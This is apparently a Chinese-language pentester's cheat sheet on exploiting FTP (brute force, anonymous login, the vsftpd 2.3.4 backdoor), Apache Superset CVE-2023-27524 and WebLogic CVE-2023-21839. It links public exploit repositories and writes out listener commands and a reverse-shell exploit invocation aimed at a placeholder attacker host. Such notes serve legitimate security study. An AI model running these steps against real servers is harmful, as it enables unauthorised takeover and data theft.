一些组件对应的常见漏洞

# FTP 协议

# 基础爆破

可以使用 msf 中的 ftp 模块爆破。

# ftp 匿名访问

用户名:anonymous 密码:为空或者任意邮箱

# vsftpd2.3.4 笑脸漏洞

在 vsftpd 2.3.4 版本中,在登录输入用户名时输入 😃 类似于笑脸的符号,会导致服务处理开启 6200 后门端口,直接执行系统命令。攻击者可以使用 Metasploit 或 nc 连接后门端口利用。

使用以下命令可以优化伪终端:

1
2

python –c “import pty;pty.spawn (‘/bin/bash’)”

# Apache

# CVE-2023-27524

# 简介

Apache Superset 2.0.1 版本及之前版本存在安全漏洞。
该漏洞存在于 Apache Superset 中,是一个身份认证绕过漏洞。由于 Apache Superset 不安全的默认配置,未根据安装说明更改默认 SECRET_KEY 的系统受此漏洞影响,未经身份认证的远程攻击者利用此漏洞可以访问未经授权的资源或执行恶意代码。该漏洞的危害包括但不限于敏感数据窃取、任意代码执行等。

# 复现

通过以下仓库获取利用文件

1
2

https://github.com/horizon3ai/CVE-2023-27524

程序会返回一个 cookie 值,使用该 cookie 值替换自己的登录数据包 cookie,可以登录管理后台。

# Weblogic

# CVE-2023-21839

# 简介

由于 Weblogic IIOP/T3 协议存在缺陷,当 IIOP/T3 协议开启时,允许未经身份验证的攻击者通过 IIOP/T3 协议网络访问攻击存在安全风险的 WebLogic Server,漏洞利用成功 WebLogic Server 可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

# 复现

  1. 从以下仓库下载 JNDIExploit

    1
    2

    https://github.com/WhiteHSBG/JNDIExploit

  2. 开启 jdni 监听

    1
    2

    java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xx.xx.xx.xx

    使用 nc 监听端口
    1
    2

    nc -lvvp 6789

  3. 获取 poc

    1
    2

    https://github.com/4ra1n/CVE-2023-21839

    这个需要自行编译一下。

  4. 反弹 shell

    1
    2

    CVE-2023-21839.exe -ip xx.xx.xx.xx -port 7001 -ldap ldap://xx.xx.xx.xx:1389/Basic/ReverseShell/xx.xx.xx.xx/6789